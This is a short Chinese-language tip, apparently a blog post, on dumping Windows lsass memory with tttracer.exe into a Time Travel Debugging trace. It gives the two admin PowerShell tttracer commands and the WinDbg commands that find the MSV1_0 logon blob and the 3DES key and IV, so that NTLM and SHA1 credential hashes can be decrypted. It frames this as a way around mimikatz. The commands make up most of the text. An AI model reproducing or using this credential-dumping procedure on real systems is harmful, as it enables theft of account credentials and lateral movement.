分享一个小tips,利用tttracer.exe进行lsass转储,转储成Time Travel Debugging格式,思路来源:https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392
首先新建两个管理员权限的powershell终端,分别运行:
代码语言:javascript复制tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)
tttracer -stop (Get-Process lsass | Select -expand id)然后将得到的.run文件放入WinDbg Preview.
懒得本地再装WinDbg Preview.了直接用作者的图
然后运行下面的指令得到MSV1_0 blob区域
代码语言:javascript复制db poi(poi(poi(poi(lsasrv!LogonSessionList)) 0x108) 0x10) 0x28 0x8 L0x1b0
然后运行下面的指令拿到3des的key和iv
代码语言:javascript复制db lsasrv!InitializationVector L8
db poi(poi(lsasrv!h3DesKey) 0x10) 0x38 4 L0x18
最后就是用key和iv去解密blob拿到ntlm、sha1
注意该方法dump的文件mimikatz无法解密,不同版本偏移不同所以windbg命令也不相同
